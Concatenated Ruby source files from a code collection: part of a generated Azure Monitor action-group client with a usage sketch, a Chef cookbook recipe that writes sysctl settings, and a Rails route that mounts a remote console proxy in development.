JSON.generate(request_content, quirks_mode: true) : nil path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}/subscribe' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'resourceGroupName' => resource_group_name,'actionGroupName' => action_group_name,'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, body: request_content, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:post, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 || status_code == 409 error_model = JSON.load(response_content) fail MsRest::HttpOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? result end promise.execute end end end
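# ---------------------------------------------------------------------------
# Illustrative usage sketch, not part of the generated file above. It assumes
# the `ms_rest_azure` and `azure_mgmt_monitor` gems are installed; the tenant,
# client, secret, subscription, resource group, and action group values below
# are placeholders, not values taken from this document.
# ---------------------------------------------------------------------------
require 'ms_rest_azure'
require 'azure_mgmt_monitor'

# Hypothetical service-principal credentials.
provider = MsRestAzure::ApplicationTokenProvider.new('tenant-id', 'client-id', 'client-secret')
credentials = MsRest::TokenCredentials.new(provider)

# Build the management client and point it at a (placeholder) subscription.
client = Azure::Monitor::Mgmt::V2018_03_01::MonitorManagementClient.new(credentials)
client.subscription_id = '00000000-0000-0000-0000-000000000000'

# The operations class shown above takes the client in its constructor.
action_groups = Azure::Monitor::Mgmt::V2018_03_01::ActionGroups.new(client)

# Fetch one action group, then list every group in the same resource group.
group  = action_groups.get('example-rg', 'example-action-group')
groups = action_groups.list_by_resource_group('example-rg')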
45.950495
159
0.70502
1a1828405dd8bd43dde09fbc6945be2b9fc8980a
1,063
# # Cookbook Name:: sysctl # Recipe:: default # # Copyright 2011, Fewbytes Technologies LTD # Copyright 2012, Chris Roberts <[email protected]> # Copyright 2013-2014, OneHealth Solutions, Inc. # include_recipe 'sysctl::service' if node['sysctl']['conf_dir'] directory node['sysctl']['conf_dir'] do owner 'root' group 'root' mode 0755 action :create end end if Sysctl.config_file(node) # this is called by the sysctl_param lwrp to trigger template creation ruby_block 'save-sysctl-params' do action :nothing block do end notifies :create, "template[#{Sysctl.config_file(node)}]", :delayed end # this needs to have an action in case node.sysctl.params has changed # and also needs to be called for persistence on lwrp changes via the # ruby_block template Sysctl.config_file(node) do action :create source 'sysctl.conf.erb' mode '0644' notifies :start, 'service[procps]', :immediately only_if do node['sysctl']['params'] && !node['sysctl']['params'].empty? end end end
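# Illustrative wrapper-recipe sketch, not part of the cookbook file above. It
# assumes the sysctl_param resource referenced in the recipe's comments is
# provided by this same cookbook; the kernel key and value are placeholders.
include_recipe 'sysctl::default'

# Setting a single kernel parameter; the resource notifies the
# save-sysctl-params ruby_block, which rewrites the sysctl config file
# rendered by the template defined above.
sysctl_param 'vm.swappiness' do
  value 10
end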
24.72093
72
0.697084
bb7f41b11e8a0e83893cc019652d05d7bc565972
296
Vmdb::Application.routes.draw do if Rails.env.development? && ENV['MOUNT_REMOTE_CONSOLE_PROXY'] logger = Logger.new(STDOUT) logger.level = Logger.const_get(::Settings.log.level_remote_console.upcase) mount RemoteConsole::RackServer.new(:logger => logger) => '/ws/console' end end
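# Illustrative note, not part of the routes file above: the conditional mount
# is only evaluated when the application boots in the development environment
# with the variable set, for example (assuming a standard Rails binstub):
#
#   MOUNT_REMOTE_CONSOLE_PROXY=1 bin/rails server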
37
79
0.739865